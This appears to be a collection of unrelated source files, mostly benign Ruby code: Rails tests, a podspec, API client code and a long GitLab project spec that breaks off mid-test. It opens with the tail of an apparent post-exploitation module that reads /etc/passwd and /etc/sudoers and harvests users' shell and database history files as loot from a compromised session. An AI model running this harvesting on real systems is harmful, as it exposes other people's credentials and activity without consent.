user = execute('/usr/bin/whoami')
users = execute('/bin/cat /etc/passwd | cut -d : -f 1').chomp.split
users = [user] if user != 'root' || users.blank?
vprint_status("Retrieving history for #{users.length} users")
shells = %w{ash bash csh ksh sh tcsh zsh}
users.each do |u|
home = get_home_dir(u)
shells.each do |shell|
get_shell_history(u, home, shell)
end
get_mysql_history(u, home)
get_psql_history(u, home)
get_mongodb_history(u, home)
get_vim_history(u, home)
end
last = execute('/usr/bin/last && /usr/bin/lastlog')
sudoers = cat_file('/etc/sudoers')
save('Last logs', last) unless last.blank?
save('Sudoers', sudoers) unless sudoers.blank? || sudoers =~ /Permission denied/
end
def save(msg, data, ctype = 'text/plain')
ltype = 'linux.enum.users'
loot = store_loot(ltype, ctype, session, data, nil, msg)
print_good("#{msg} stored in #{loot.to_s}")
end
def execute(cmd)
vprint_status("Execute: #{cmd}")
output = cmd_exec(cmd)
output
end
def cat_file(filename)
vprint_status("Download: #{filename}")
output = read_file(filename)
output
end
def get_home_dir(user)
home = execute("echo ~#{user}")
if home.empty?
if user == 'root'
home = '/root'
else
home = "/home/#{user}"
end
end
home
end
def get_shell_history(user, home, shell)
vprint_status("Extracting #{shell} history for #{user}")
hist = cat_file("#{home}/.#{shell}_history")
save("#{shell} history for #{user}", hist) unless hist.blank? || hist =~ /No such file or directory/
end
def get_mysql_history(user, home)
vprint_status("Extracting MySQL history for #{user}")
sql_hist = cat_file("#{home}/.mysql_history")
save("MySQL history for #{user}", sql_hist) unless sql_hist.blank? || sql_hist =~ /No such file or directory/
end
def get_psql_history(user, home)
vprint_status("Extracting PostgreSQL history for #{user}")
sql_hist = cat_file("#{home}/.psql_history")
save("PostgreSQL history for #{user}", sql_hist) unless sql_hist.blank? || sql_hist =~ /No such file or directory/
end
def get_mongodb_history(user, home)
vprint_status("Extracting MongoDB history for #{user}")
sql_hist = cat_file("#{home}/.dbshell")
save("MongoDB history for #{user}", sql_hist) unless sql_hist.blank? || sql_hist =~ /No such file or directory/
end
def get_vim_history(user, home)
vprint_status("Extracting Vim history for #{user}")
vim_hist = cat_file("#{home}/.viminfo")
save("Vim history for #{user}", vim_hist) unless vim_hist.blank? || vim_hist =~ /No such file or directory/
end
end
| 31.302521 | 118 | 0.638121 |
ff45310ed084a656fa34d71a538b01831229ad76 | 779 | require 'test_helper'
class StaticPagesControllerTest < ActionDispatch::IntegrationTest
def setup
@base_title = "Ruby on Rails Tutorial Sample App"
end
test "should get root" do
get root_path
assert_response :success
end
test "should get home" do
get home_path
assert_response :success
assert_select "title", @base_title
end
test "should get help" do
get help_path
assert_response :success
assert_select "title", "Help | #{@base_title}"
end
test "should get about" do
get about_path
assert_response :success
assert_select "title", "About | #{@base_title}"
end
test "should get contact" do
get contact_path
assert_response :success
assert_select "title", "Contact | #{@base_title}"
end
end
| 21.054054 | 65 | 0.699615 |
08c7964c90bbe3273c6fa3ac9e28c034b51e5d8c | 880 |
Pod::Spec.new do |s|
s.name = "UpstraUIKit"
s.version = "1.0.0"
s.summary = "A brief description of UpstraUIKit project."
s.description = "An extended description of UpstraUIKit project."
s.homepage = "https://github.com/EkoCommunications/EkoMessagingSDKUIKit"
s.license = { :type => 'Copyright', :text => <<-LICENSE
Copyright 2018
Permission is granted to...
LICENSE
}
s.author = { "$(git config user.name)" => "$(git config user.email)" }
s.source = { :git => 'https://github.com/EkoCommunications/EkoMessagingSDKUIKit.git', :tag => "#{s.version}" }
s.vendored_frameworks = 'UpstraUIKit.framework', 'EkoChat.framework', 'Realm.framework'
s.platform = :ios
s.swift_version = "5"
s.ios.deployment_target = '11.1'
end
| 44 | 120 | 0.581818 |
bb4e50467086f2871d6bc40c3818aca2336062fe | 2,029 | require 'nokogiri'
module Stratify
module Garmin
class RssItemAdapter
attr_reader :item
def initialize(item)
@item = item
end
def activity_type
description_content_in_table_row(4)
end
def created_at
item.pubDate
end
def description
description_as_nokogiri_doc.at_xpath('//table/tr[1]/td[1]').content
end
def distance_in_miles
distance_string = description_content_in_table_row(6)
distance_string.to_f
end
def elevation_gain_in_feet
elevation_gain_string = description_content_in_table_row(8)
elevation_gain_string.to_i
end
def event_type
description_content_in_table_row(5)
end
def guid
guid_url = item.guid
guid_url.slice(/\d*$/) # parse the id out of the url ".../activity/12345678"
end
def starting_latitude
starting_location[:latitude]
end
def starting_longitude
starting_location[:longitude]
end
def time_in_seconds
time_string = description_content_in_table_row(7)
time_components = time_string.split(':').map(&:to_i)
hours, minutes, seconds = time_components[0], time_components[1], time_components[2]
(hours * 3600) + (minutes * 60) + seconds
end
def title
item.title
end
def username
description_content_in_table_row(2)
end
private
def description_as_nokogiri_doc
@description_doc ||= Nokogiri::HTML(item.description)
end
def description_content_in_table_row(row_index)
description_as_nokogiri_doc.at_xpath("//table/tr[#{row_index}]/td[2]").content
end
def starting_location
lat_long_pair_as_strings = item.georss_point.split
lat_long_pair_as_floats = lat_long_pair_as_strings.map(&:to_f)
{:latitude => lat_long_pair_as_floats.first, :longitude => lat_long_pair_as_floats.last}
end
end
end
end
| 24.154762 | 96 | 0.65451 |
f82ba8d3297b037397bdaed37ff0b41380771e9e | 168 | require 'jsonmodel'
require 'client_enum_source'
JSONModel::init(:client_mode => false, :strict_mode => false, :enum_source => ClientEnumSource.new)
include JSONModel
| 28 | 99 | 0.785714 |
abf12f3d4b1fa90c7e4fc50012cb906b436d5e82 | 741 | class SessionsController < ApplicationController
def new
end
def create
@user = User.find_by(email: params[:session][:email].downcase)
if @user && @user.authenticate(params[:session][:password])
if @user.activated?
log_in @user
params[:session][:remember_me] == '1' ? remember(@user) : forget(@user)
redirect_back_or @user
else
message = "Account not activated."
message += " Check your email for the actvation link."
flash[:warning] = message
redirect_to root_url
end
else
flash.now[:danger] = 'Invalid email/password combination'
render 'new'
end
end
def destroy
log_out if logged_in?
redirect_to root_url
end
end
| 24.7 | 79 | 0.635628 |
bb531ac531ac21f4fdef636467eff87b6037b52b | 2,524 | # Licensed to Elasticsearch B.V. under one or more contributor
# license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright
# ownership. Elasticsearch B.V. licenses this file to you under
# the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
module Elasticsearch
module API
module Cat
module Actions
# Returns a concise representation of the cluster health.
#
# @option arguments [String] :format a short version of the Accept header, e.g. json, yaml
# @option arguments [List] :h Comma-separated list of column names to display
# @option arguments [Boolean] :help Return help information
# @option arguments [List] :s Comma-separated list of column names or column aliases to sort by
# @option arguments [String] :time The unit in which to display time values
# (options: d,h,m,s,ms,micros,nanos)
# @option arguments [Boolean] :ts Set to false to disable timestamping
# @option arguments [Boolean] :v Verbose mode. Display column headers
# @option arguments [Hash] :headers Custom HTTP headers
#
# @see https://www.elastic.co/guide/en/elasticsearch/reference/7.8/cat-health.html
#
def health(arguments = {})
headers = arguments.delete(:headers) || {}
arguments = arguments.clone
method = Elasticsearch::API::HTTP_GET
path = "_cat/health"
params = Utils.__validate_and_extract_params arguments, ParamsRegistry.get(__method__)
params[:h] = Utils.__listify(params[:h]) if params[:h]
body = nil
perform_request(method, path, params, body, headers).body
end
# Register this action with its valid params when the module is loaded.
#
# @since 6.2.0
ParamsRegistry.register(:health, [
:format,
:h,
:help,
:s,
:time,
:ts,
:v
].freeze)
end
end
end
end
| 37.671642 | 103 | 0.656498 |
1c528df60a502115485137b46f002375fa60c71e | 846 | require 'test_helper'
describe Aliyun::Oss::Struct::Directory do
let(:bucket_name) { 'bucket-name' }
let(:bucket_location) { 'oss-cn-beijing' }
let(:host) { "#{bucket_location}.aliyuncs.com" }
let(:endpoint) { "http://#{bucket_name}.#{host}/" }
let(:access_key) { 'AASSJJKKW94324JJJJ' }
let(:secret_key) { 'OtSSSSxIsf111A7SwPzILwy8Bw21TLhquhboDYROV' }
let(:client) do
Aliyun::Oss::Client.new(
access_key,
secret_key,
host: host,
bucket: bucket_name
)
end
it '#list should list objects under directory' do
path = "http://#{bucket_name}.#{host}/?prefix=fun/movie/"
stub_get_request(path, 'directory/list.xml')
dir = Aliyun::Oss::Struct::Directory.new(key: 'fun/movie/', client: client)
dir.list.each do |obj|
assert_kind_of(Aliyun::Oss::Struct::File, obj)
end
end
end
| 30.214286 | 79 | 0.658392 |
8766638403cecca1cb936648bb4133fd30f2a7cf | 56 | module CacheTranslatedAttribute
VERSION = "0.0.2"
end
| 14 | 31 | 0.767857 |
39581c133b305b421dff0f2732f2bf628eb6e638 | 129,699 | require 'spec_helper'
describe Project do
include ProjectForksHelper
describe 'associations' do
it { is_expected.to belong_to(:group) }
it { is_expected.to belong_to(:namespace) }
it { is_expected.to belong_to(:creator).class_name('User') }
it { is_expected.to have_many(:users) }
it { is_expected.to have_many(:services) }
it { is_expected.to have_many(:events) }
it { is_expected.to have_many(:merge_requests) }
it { is_expected.to have_many(:issues) }
it { is_expected.to have_many(:milestones) }
it { is_expected.to have_many(:project_members).dependent(:delete_all) }
it { is_expected.to have_many(:users).through(:project_members) }
it { is_expected.to have_many(:requesters).dependent(:delete_all) }
it { is_expected.to have_many(:notes) }
it { is_expected.to have_many(:snippets).class_name('ProjectSnippet') }
it { is_expected.to have_many(:deploy_keys_projects) }
it { is_expected.to have_many(:deploy_keys) }
it { is_expected.to have_many(:hooks) }
it { is_expected.to have_many(:protected_branches) }
it { is_expected.to have_one(:forked_project_link) }
it { is_expected.to have_one(:slack_service) }
it { is_expected.to have_one(:microsoft_teams_service) }
it { is_expected.to have_one(:mattermost_service) }
it { is_expected.to have_one(:packagist_service) }
it { is_expected.to have_one(:pushover_service) }
it { is_expected.to have_one(:asana_service) }
it { is_expected.to have_many(:boards) }
it { is_expected.to have_one(:campfire_service) }
it { is_expected.to have_one(:drone_ci_service) }
it { is_expected.to have_one(:emails_on_push_service) }
it { is_expected.to have_one(:pipelines_email_service) }
it { is_expected.to have_one(:irker_service) }
it { is_expected.to have_one(:pivotaltracker_service) }
it { is_expected.to have_one(:hipchat_service) }
it { is_expected.to have_one(:flowdock_service) }
it { is_expected.to have_one(:assembla_service) }
it { is_expected.to have_one(:slack_slash_commands_service) }
it { is_expected.to have_one(:mattermost_slash_commands_service) }
it { is_expected.to have_one(:gemnasium_service) }
it { is_expected.to have_one(:buildkite_service) }
it { is_expected.to have_one(:bamboo_service) }
it { is_expected.to have_one(:teamcity_service) }
it { is_expected.to have_one(:jira_service) }
it { is_expected.to have_one(:github_service) }
it { is_expected.to have_one(:redmine_service) }
it { is_expected.to have_one(:custom_issue_tracker_service) }
it { is_expected.to have_one(:bugzilla_service) }
it { is_expected.to have_one(:gitlab_issue_tracker_service) }
it { is_expected.to have_one(:external_wiki_service) }
it { is_expected.to have_one(:project_feature) }
it { is_expected.to have_one(:statistics).class_name('ProjectStatistics') }
it { is_expected.to have_one(:import_data).class_name('ProjectImportData') }
it { is_expected.to have_one(:last_event).class_name('Event') }
it { is_expected.to have_one(:forked_from_project).through(:forked_project_link) }
it { is_expected.to have_one(:auto_devops).class_name('ProjectAutoDevops') }
it { is_expected.to have_many(:commit_statuses) }
it { is_expected.to have_many(:pipelines) }
it { is_expected.to have_many(:builds) }
it { is_expected.to have_many(:build_trace_section_names)}
it { is_expected.to have_many(:runner_projects) }
it { is_expected.to have_many(:runners) }
it { is_expected.to have_many(:variables) }
it { is_expected.to have_many(:triggers) }
it { is_expected.to have_many(:pages_domains) }
it { is_expected.to have_many(:labels).class_name('ProjectLabel') }
it { is_expected.to have_many(:users_star_projects) }
it { is_expected.to have_many(:environments) }
it { is_expected.to have_many(:deployments) }
it { is_expected.to have_many(:todos) }
it { is_expected.to have_many(:releases) }
it { is_expected.to have_many(:lfs_objects_projects) }
it { is_expected.to have_many(:project_group_links) }
it { is_expected.to have_many(:notification_settings).dependent(:delete_all) }
it { is_expected.to have_many(:forks).through(:forked_project_links) }
it { is_expected.to have_many(:approver_groups).dependent(:destroy) }
it { is_expected.to have_many(:uploads) }
it { is_expected.to have_many(:pipeline_schedules) }
it { is_expected.to have_many(:members_and_requesters) }
it { is_expected.to have_many(:clusters) }
it { is_expected.to have_many(:custom_attributes).class_name('ProjectCustomAttribute') }
it { is_expected.to have_many(:project_badges).class_name('ProjectBadge') }
it { is_expected.to have_many(:lfs_file_locks) }
it { is_expected.to have_many(:project_deploy_tokens) }
it { is_expected.to have_many(:deploy_tokens).through(:project_deploy_tokens) }
context 'after initialized' do
it "has a project_feature" do
expect(described_class.new.project_feature).to be_present
end
end
context 'when creating a new project' do
it 'automatically creates a CI/CD settings row' do
project = create(:project)
expect(project.ci_cd_settings).to be_an_instance_of(ProjectCiCdSetting)
expect(project.ci_cd_settings).to be_persisted
end
end
context 'updating cd_cd_settings' do
it 'does not raise an error' do
project = create(:project)
expect { project.update(ci_cd_settings: nil) }.not_to raise_exception
end
end
describe '#members & #requesters' do
let(:project) { create(:project, :public, :access_requestable) }
let(:requester) { create(:user) }
let(:developer) { create(:user) }
before do
project.request_access(requester)
project.add_developer(developer)
end
it_behaves_like 'members and requesters associations' do
let(:namespace) { project }
end
end
end
describe 'modules' do
subject { described_class }
it { is_expected.to include_module(Gitlab::ConfigHelper) }
it { is_expected.to include_module(Gitlab::ShellAdapter) }
it { is_expected.to include_module(Gitlab::VisibilityLevel) }
it { is_expected.to include_module(Referable) }
it { is_expected.to include_module(Sortable) }
end
describe 'scopes' do
context '#with_wiki_enabled' do
it 'returns a project' do
project = create(:project_empty_repo, wiki_access_level: ProjectFeature::ENABLED)
project1 = create(:project, wiki_access_level: ProjectFeature::DISABLED)
expect(described_class.with_wiki_enabled).to include(project)
expect(described_class.with_wiki_enabled).not_to include(project1)
end
end
end
describe 'validation' do
let!(:project) { create(:project) }
it { is_expected.to validate_presence_of(:name) }
it { is_expected.to validate_uniqueness_of(:name).scoped_to(:namespace_id) }
it { is_expected.to validate_length_of(:name).is_at_most(255) }
it { is_expected.to validate_presence_of(:path) }
it { is_expected.to validate_length_of(:path).is_at_most(255) }
it { is_expected.to validate_length_of(:description).is_at_most(2000) }
it { is_expected.to validate_length_of(:ci_config_path).is_at_most(255) }
it { is_expected.to allow_value('').for(:ci_config_path) }
it { is_expected.not_to allow_value('test/../foo').for(:ci_config_path) }
it { is_expected.not_to allow_value('/test/foo').for(:ci_config_path) }
it { is_expected.to validate_presence_of(:creator) }
it { is_expected.to validate_presence_of(:namespace) }
it { is_expected.to validate_presence_of(:repository_storage) }
it 'does not allow new projects beyond user limits' do
project2 = build(:project)
allow(project2).to receive(:creator).and_return(double(can_create_project?: false, projects_limit: 0).as_null_object)
expect(project2).not_to be_valid
expect(project2.errors[:limit_reached].first).to match(/Personal project creation is not allowed/)
end
describe 'wiki path conflict' do
context "when the new path has been used by the wiki of other Project" do
it 'has an error on the name attribute' do
new_project = build_stubbed(:project, namespace_id: project.namespace_id, path: "#{project.path}.wiki")
expect(new_project).not_to be_valid
expect(new_project.errors[:name].first).to eq('has already been taken')
end
end
context "when the new wiki path has been used by the path of other Project" do
it 'has an error on the name attribute' do
project_with_wiki_suffix = create(:project, path: 'foo.wiki')
new_project = build_stubbed(:project, namespace_id: project_with_wiki_suffix.namespace_id, path: 'foo')
expect(new_project).not_to be_valid
expect(new_project.errors[:name].first).to eq('has already been taken')
end
end
end
context 'repository storages inclusion' do
let(:project2) { build(:project, repository_storage: 'missing') }
before do
storages = { 'custom' => { 'path' => 'tmp/tests/custom_repositories' } }
allow(Gitlab.config.repositories).to receive(:storages).and_return(storages)
end
it "does not allow repository storages that don't match a label in the configuration" do
expect(project2).not_to be_valid
expect(project2.errors[:repository_storage].first).to match(/is not included in the list/)
end
end
context '#mark_stuck_remote_mirrors_as_failed!' do
it 'fails stuck remote mirrors' do
project = create(:project, :repository, :remote_mirror)
project.remote_mirrors.first.update_attributes(
update_status: :started,
last_update_at: 2.days.ago
)
expect do
project.mark_stuck_remote_mirrors_as_failed!
end.to change { project.remote_mirrors.stuck.count }.from(1).to(0)
end
end
context 'mirror' do
subject { build(:project, mirror: true) }
it { is_expected.to validate_presence_of(:import_url) }
it { is_expected.to validate_presence_of(:mirror_user) }
end
it 'does not allow an invalid URI as import_url' do
project2 = build(:project, import_url: 'invalid://')
expect(project2).not_to be_valid
end
it 'does allow a valid URI as import_url' do
project2 = build(:project, import_url: 'ssh://[email protected]/project.git')
expect(project2).to be_valid
end
it 'allows an empty URI' do
project2 = build(:project, import_url: '')
expect(project2).to be_valid
end
it 'does not produce import data on an empty URI' do
project2 = build(:project, import_url: '')
expect(project2.import_data).to be_nil
end
it 'does not produce import data on an invalid URI' do
project2 = build(:project, import_url: 'test://')
expect(project2.import_data).to be_nil
end
it "does not allow blocked import_url localhost" do
project2 = build(:project, import_url: 'http://localhost:9000/t.git')
expect(project2).to be_invalid
expect(project2.errors[:import_url].first).to include('Requests to localhost are not allowed')
end
it "does not allow blocked import_url port" do
project2 = build(:project, import_url: 'http://github.com:25/t.git')
expect(project2).to be_invalid
expect(project2.errors[:import_url].first).to include('Only allowed ports are 22, 80, 443')
end
it 'creates import state when mirror gets enabled' do
project2 = create(:project)
expect do
project2.update_attributes(mirror: true, import_url: generate(:url), mirror_user: project.creator)
end.to change { ProjectImportState.where(project: project2).count }.from(0).to(1)
end
describe 'project pending deletion' do
let!(:project_pending_deletion) do
create(:project,
pending_delete: true)
end
let(:new_project) do
build(:project,
name: project_pending_deletion.name,
namespace: project_pending_deletion.namespace)
end
before do
new_project.validate
end
it 'contains errors related to the project being deleted' do
expect(new_project.errors.full_messages.first).to eq('The project is still being deleted. Please try again later.')
end
end
describe 'path validation' do
it 'allows paths reserved on the root namespace' do
project = build(:project, path: 'api')
expect(project).to be_valid
end
it 'rejects paths reserved on another level' do
project = build(:project, path: 'tree')
expect(project).not_to be_valid
end
it 'rejects nested paths' do
parent = create(:group, :nested, path: 'environments')
project = build(:project, path: 'folders', namespace: parent)
expect(project).not_to be_valid
end
it 'allows a reserved group name' do
parent = create(:group)
project = build(:project, path: 'avatar', namespace: parent)
expect(project).to be_valid
end
it 'allows a path ending in a period' do
project = build(:project, path: 'foo.')
expect(project).to be_valid
end
end
end
describe 'project token' do
it 'sets an random token if none provided' do
project = FactoryBot.create(:project, runners_token: '')
expect(project.runners_token).not_to eq('')
end
it 'does not set an random token if one provided' do
project = FactoryBot.create(:project, runners_token: 'my-token')
expect(project.runners_token).to eq('my-token')
end
end
describe 'Respond to' do
it { is_expected.to respond_to(:url_to_repo) }
it { is_expected.to respond_to(:repo_exists?) }
it { is_expected.to respond_to(:execute_hooks) }
it { is_expected.to respond_to(:owner) }
it { is_expected.to respond_to(:path_with_namespace) }
it { is_expected.to respond_to(:full_path) }
end
describe 'delegation' do
[:add_guest, :add_reporter, :add_developer, :add_master, :add_user, :add_users].each do |method|
it { is_expected.to delegate_method(method).to(:team) }
end
it { is_expected.to delegate_method(:members).to(:team).with_prefix(true) }
it { is_expected.to delegate_method(:name).to(:owner).with_prefix(true).with_arguments(allow_nil: true) }
end
describe '#to_reference' do
let(:owner) { create(:user, name: 'Gitlab') }
let(:namespace) { create(:namespace, path: 'sample-namespace', owner: owner) }
let(:project) { create(:project, path: 'sample-project', namespace: namespace) }
let(:group) { create(:group, name: 'Group', path: 'sample-group') }
context 'when nil argument' do
it 'returns nil' do
expect(project.to_reference).to be_nil
end
end
context 'when full is true' do
it 'returns complete path to the project' do
expect(project.to_reference(full: true)).to eq 'sample-namespace/sample-project'
expect(project.to_reference(project, full: true)).to eq 'sample-namespace/sample-project'
expect(project.to_reference(group, full: true)).to eq 'sample-namespace/sample-project'
end
end
context 'when same project argument' do
it 'returns nil' do
expect(project.to_reference(project)).to be_nil
end
end
context 'when cross namespace project argument' do
let(:another_namespace_project) { create(:project, name: 'another-project') }
it 'returns complete path to the project' do
expect(project.to_reference(another_namespace_project)).to eq 'sample-namespace/sample-project'
end
end
context 'when same namespace / cross-project argument' do
let(:another_project) { create(:project, namespace: namespace) }
it 'returns path to the project' do
expect(project.to_reference(another_project)).to eq 'sample-project'
end
end
context 'when different namespace / cross-project argument' do
let(:another_namespace) { create(:namespace, path: 'another-namespace', owner: owner) }
let(:another_project) { create(:project, path: 'another-project', namespace: another_namespace) }
it 'returns full path to the project' do
expect(project.to_reference(another_project)).to eq 'sample-namespace/sample-project'
end
end
context 'when argument is a namespace' do
context 'with same project path' do
it 'returns path to the project' do
expect(project.to_reference(namespace)).to eq 'sample-project'
end
end
context 'with different project path' do
it 'returns full path to the project' do
expect(project.to_reference(group)).to eq 'sample-namespace/sample-project'
end
end
end
end
describe '#to_human_reference' do
let(:owner) { create(:user, name: 'Gitlab') }
let(:namespace) { create(:namespace, name: 'Sample namespace', owner: owner) }
let(:project) { create(:project, name: 'Sample project', namespace: namespace) }
context 'when nil argument' do
it 'returns nil' do
expect(project.to_human_reference).to be_nil
end
end
context 'when same project argument' do
it 'returns nil' do
expect(project.to_human_reference(project)).to be_nil
end
end
context 'when cross namespace project argument' do
let(:another_namespace_project) { create(:project, name: 'another-project') }
it 'returns complete name with namespace of the project' do
expect(project.to_human_reference(another_namespace_project)).to eq 'Gitlab / Sample project'
end
end
context 'when same namespace / cross-project argument' do
let(:another_project) { create(:project, namespace: namespace) }
it 'returns name of the project' do
expect(project.to_human_reference(another_project)).to eq 'Sample project'
end
end
end
describe '#merge_method' do
using RSpec::Parameterized::TableSyntax
where(:ff, :rebase, :method) do
true | true | :ff
true | false | :ff
false | true | :rebase_merge
false | false | :merge
end
with_them do
let(:project) { build(:project, merge_requests_rebase_enabled: rebase, merge_requests_ff_only_enabled: ff) }
subject { project.merge_method }
it { is_expected.to eq(method) }
end
end
it 'returns valid url to repo' do
project = described_class.new(path: 'somewhere')
expect(project.url_to_repo).to eq(Gitlab.config.gitlab_shell.ssh_path_prefix + 'somewhere.git')
end
describe "#web_url" do
let(:project) { create(:project, path: "somewhere") }
it 'returns the full web URL for this repo' do
expect(project.web_url).to eq("#{Gitlab.config.gitlab.url}/#{project.namespace.full_path}/somewhere")
end
end
describe "#kerberos_url_to_repo" do
let(:project) { create(:project, path: "somewhere") }
it 'returns valid kerberos url for this repo' do
expect(project.kerberos_url_to_repo).to eq("#{Gitlab.config.build_gitlab_kerberos_url}/#{project.namespace.path}/somewhere.git")
end
end
describe "#readme_url" do
let(:project) { create(:project, :repository, path: "somewhere") }
context 'with a non-existing repository' do
it 'returns nil' do
allow(project.repository).to receive(:tree).with(:head).and_return(nil)
expect(project.readme_url).to be_nil
end
end
context 'with an existing repository' do
context 'when no README exists' do
it 'returns nil' do
allow_any_instance_of(Tree).to receive(:readme).and_return(nil)
expect(project.readme_url).to be_nil
end
end
context 'when a README exists' do
it 'returns the README' do
expect(project.readme_url).to eql("#{Gitlab.config.gitlab.url}/#{project.namespace.full_path}/somewhere/blob/master/README.md")
end
end
end
end
describe "#new_issuable_address" do
let(:project) { create(:project, path: "somewhere") }
let(:user) { create(:user) }
context 'incoming email enabled' do
before do
stub_incoming_email_setting(enabled: true, address: "p+%{key}@gl.ab")
end
it 'returns the address to create a new issue' do
address = "p+#{project.full_path}+#{user.incoming_email_token}@gl.ab"
expect(project.new_issuable_address(user, 'issue')).to eq(address)
end
it 'returns the address to create a new merge request' do
address = "p+#{project.full_path}+merge-request+#{user.incoming_email_token}@gl.ab"
expect(project.new_issuable_address(user, 'merge_request')).to eq(address)
end
end
context 'incoming email disabled' do
before do
stub_incoming_email_setting(enabled: false)
end
it 'returns nil' do
expect(project.new_issuable_address(user, 'issue')).to be_nil
end
it 'returns nil' do
expect(project.new_issuable_address(user, 'merge_request')).to be_nil
end
end
end
describe 'last_activity methods' do
let(:timestamp) { 2.hours.ago }
# last_activity_at gets set to created_at upon creation
let(:project) { create(:project, created_at: timestamp, updated_at: timestamp) }
describe 'last_activity' do
it 'alias last_activity to last_event' do
last_event = create(:event, :closed, project: project)
expect(project.last_activity).to eq(last_event)
end
end
describe 'last_activity_date' do
it 'returns the creation date of the project\'s last event if present' do
new_event = create(:event, :closed, project: project, created_at: Time.now)
project.reload
expect(project.last_activity_at.to_i).to eq(new_event.created_at.to_i)
end
it 'returns the project\'s last update date if it has no events' do
expect(project.last_activity_date).to eq(project.updated_at)
end
it 'returns the most recent timestamp' do
project.update_attributes(updated_at: nil,
last_activity_at: timestamp,
last_repository_updated_at: timestamp - 1.hour)
expect(project.last_activity_date).to eq(timestamp)
project.update_attributes(updated_at: timestamp,
last_activity_at: timestamp - 1.hour,
last_repository_updated_at: nil)
expect(project.last_activity_date).to eq(timestamp)
end
end
end
describe '#get_issue' do
let(:project) { create(:project) }
let!(:issue) { create(:issue, project: project) }
let(:user) { create(:user) }
before do
project.add_developer(user)
end
context 'with default issues tracker' do
it 'returns an issue' do
expect(project.get_issue(issue.iid, user)).to eq issue
end
it 'returns count of open issues' do
expect(project.open_issues_count).to eq(1)
end
it 'returns nil when no issue found' do
expect(project.get_issue(999, user)).to be_nil
end
it "returns nil when user doesn't have access" do
user = create(:user)
expect(project.get_issue(issue.iid, user)).to eq nil
end
end
context 'with external issues tracker' do
let!(:internal_issue) { create(:issue, project: project) }
before do
allow(project).to receive(:external_issue_tracker).and_return(true)
end
context 'when internal issues are enabled' do
it 'returns interlan issue' do
issue = project.get_issue(internal_issue.iid, user)
expect(issue).to be_kind_of(Issue)
expect(issue.iid).to eq(internal_issue.iid)
expect(issue.project).to eq(project)
end
it 'returns an ExternalIssue when internal issue does not exists' do
issue = project.get_issue('FOO-1234', user)
expect(issue).to be_kind_of(ExternalIssue)
expect(issue.iid).to eq('FOO-1234')
expect(issue.project).to eq(project)
end
end
context 'when internal issues are disabled' do
before do
project.issues_enabled = false
project.save!
end
it 'returns always an External issues' do
issue = project.get_issue(internal_issue.iid, user)
expect(issue).to be_kind_of(ExternalIssue)
expect(issue.iid).to eq(internal_issue.iid.to_s)
expect(issue.project).to eq(project)
end
it 'returns an ExternalIssue when internal issue does not exists' do
issue = project.get_issue('FOO-1234', user)
expect(issue).to be_kind_of(ExternalIssue)
expect(issue.iid).to eq('FOO-1234')
expect(issue.project).to eq(project)
end
end
end
end
describe '#issue_exists?' do
let(:project) { create(:project) }
it 'is truthy when issue exists' do
expect(project).to receive(:get_issue).and_return(double)
expect(project.issue_exists?(1)).to be_truthy
end
it 'is falsey when issue does not exist' do
expect(project).to receive(:get_issue).and_return(nil)
expect(project.issue_exists?(1)).to be_falsey
end
end
describe '#to_param' do
context 'with namespace' do
before do
@group = create(:group, name: 'gitlab')
@project = create(:project, name: 'gitlabhq', namespace: @group)
end
it { expect(@project.to_param).to eq('gitlabhq') }
end
context 'with invalid path' do
it 'returns previous path to keep project suitable for use in URLs when persisted' do
project = create(:project, path: 'gitlab')
project.path = 'foo&bar'
expect(project).not_to be_valid
expect(project.to_param).to eq 'gitlab'
end
it 'returns current path when new record' do
project = build(:project, path: 'gitlab')
project.path = 'foo&bar'
expect(project).not_to be_valid
expect(project.to_param).to eq 'foo&bar'
end
end
end
describe '#repository' do
let(:project) { create(:project, :repository) }
it 'returns valid repo' do
expect(project.repository).to be_kind_of(Repository)
end
end
describe 'repository size restrictions' do
let(:project) { build(:project) }
before do
allow_any_instance_of(ApplicationSetting).to receive(:repository_size_limit).and_return(50)
end
describe '#changes_will_exceed_size_limit?' do
before do
allow(project).to receive(:repository_and_lfs_size).and_return(49)
end
it 'returns true when changes go over' do
expect(project.changes_will_exceed_size_limit?(5)).to be_truthy
end
end
describe '#actual_size_limit' do
it 'returns the limit set in the application settings' do
expect(project.actual_size_limit).to eq(50)
end
it 'returns the value set in the group' do
group = create(:group, repository_size_limit: 100)
project.update_attribute(:namespace_id, group.id)
expect(project.actual_size_limit).to eq(100)
end
it 'returns the value set locally' do
project.update_attribute(:repository_size_limit, 75)
expect(project.actual_size_limit).to eq(75)
end
end
describe '#size_limit_enabled?' do
it 'returns false when disabled' do
project.update_attribute(:repository_size_limit, 0)
expect(project.size_limit_enabled?).to be_falsey
end
it 'returns true when a limit is set' do
project.update_attribute(:repository_size_limit, 75)
expect(project.size_limit_enabled?).to be_truthy
end
end
describe '#above_size_limit?' do
let(:project) do
create(:project,
statistics: build(:project_statistics))
end
it 'returns true when above the limit' do
allow(project).to receive(:repository_and_lfs_size).and_return(100)
expect(project.above_size_limit?).to be_truthy
end
it 'returns false when not over the limit' do
expect(project.above_size_limit?).to be_falsey
end
end
describe '#size_to_remove' do
it 'returns the correct value' do
allow(project).to receive(:repository_and_lfs_size).and_return(100)
expect(project.size_to_remove).to eq(50)
end
end
end
describe '#repository_size_limit column' do
it 'support values up to 8 exabytes' do
project = create(:project)
project.update_column(:repository_size_limit, 8.exabytes - 1)
project.reload
expect(project.repository_size_limit).to eql(8.exabytes - 1)
end
end
describe '#default_issues_tracker?' do
it "is true if used internal tracker" do
project = build(:project)
expect(project.default_issues_tracker?).to be_truthy
end
it "is false if used other tracker" do
# NOTE: The current nature of this factory requires persistence
project = create(:redmine_project)
expect(project.default_issues_tracker?).to be_falsey
end
end
describe '#empty_repo?' do
context 'when the repo does not exist' do
let(:project) { build_stubbed(:project) }
it 'returns true' do
expect(project.empty_repo?).to be(true)
end
end
context 'when the repo exists' do
let(:project) { create(:project, :repository) }
let(:empty_project) { create(:project, :empty_repo) }
it { expect(empty_project.empty_repo?).to be(true) }
it { expect(project.empty_repo?).to be(false) }
end
end
describe '#external_issue_tracker' do
let(:project) { create(:project) }
let(:ext_project) { create(:redmine_project) }
context 'on existing projects with no value for has_external_issue_tracker' do
before do
project.update_column(:has_external_issue_tracker, nil)
